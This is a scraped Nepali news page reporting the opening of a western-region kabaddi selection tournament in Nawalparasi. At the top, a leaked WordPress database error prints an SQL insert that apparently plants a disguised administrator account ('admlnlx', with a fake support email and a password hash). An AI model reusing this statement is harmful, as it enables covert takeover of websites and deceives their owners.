WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BJjHjMMewc2aH.Nks7ME08e09tmQSr/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 15:13:21', '', 'admlnlx', 'admlnlx')
सहबान अन्सारी,
नवलपरासी, मंसिर २२–
जिल्लाको कुडिया–५ हरखपुरामा ७ अौ राष्ट्रिय पश्चिमाञ्चल स्तरिय कबड्डी छनौट प्रयोगिता आज बाट सुरू भएको छ।
जिल्ला खेलकुद विकास समिति नवलपरासीको आयोजनामा आयोजित कबड्डी छनौट प्रतियोगितामा पश्चिमाञ्चल विकास क्षेत्रबाट गुल्मी, कपिलवस्तु, तनहुँ, रूपन्देही, कास्की र नवलपरासीका जिल्लाहरूको सहभागीता रहेको छ ।
प्रतियोगिताको उदघाटन कबड्डी संघका केन्द्रीय अध्यक्ष तुलसी थापा गौतमको प्रमुख आतिथ्यता तथा जिल्ला खेलकुद समितिका नवलपरासीका अध्यक्ष कुमार आलेको अध्यक्षतामा भएको थियो ।
सो अवसरमा कबड्डी संघका केन्द्रीय उपाध्यक्ष संगीता हमाल, संघका सदस्य बिमल पोखरेल, पशुपति प्रजापति लगायतहरूको उपस्थित रहेको थियो ।
पश्चिमाञ्चल स्तरीय कबड्डी छनौट प्रतियोगिता तिन दिन संचालन रहने आयोजकले जनाएको छ।